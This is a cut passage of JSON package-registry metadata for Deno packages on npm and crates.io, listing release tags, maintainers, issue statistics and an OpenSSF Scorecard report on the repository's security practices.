repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T14:40:31.848Z","dependent_packages_count":0,"downloads":7079,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/win32-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/win32-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/win32-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/win32-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T22:08:47.447Z","updated_at":"2024-12-12T22:08:47.447Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T22:08:47.918Z","updated_at":"2024-12-12T22:08:47.918Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T22:08:48.054Z","updated_at":"2024-12-12T22:08:48.054Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:14.034Z","updated_at":"2026-03-27T13:02:14.034Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5812038,"maintainers_count":1244003,"namespaces_count":426096,"keywords_count":888784,"github":"npm","metadata":{"funded_packages_count":192391,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-01T05:02:08.896Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12022793,"name":"deno_maybe_sync","ecosystem":"cargo","description":"Optionally sync structures for Deno crates","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":45,"first_release_published_at":"2025-08-19T20:04:49.552Z","latest_release_published_at":"2026-08-06T11:33:05.692Z","latest_release_number":"0.44.0","last_synced_at":"2026-08-29T21:57:01.783Z","created_at":"2025-08-19T20:18:56.310Z","updated_at":"2026-08-29T21:57:01.783Z","registry_url":"https://crates.io/crates/deno_maybe_sync/","install_command":"cargo install deno_maybe_sync","documentation_url":"https://docs.rs/deno_maybe_sync/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: 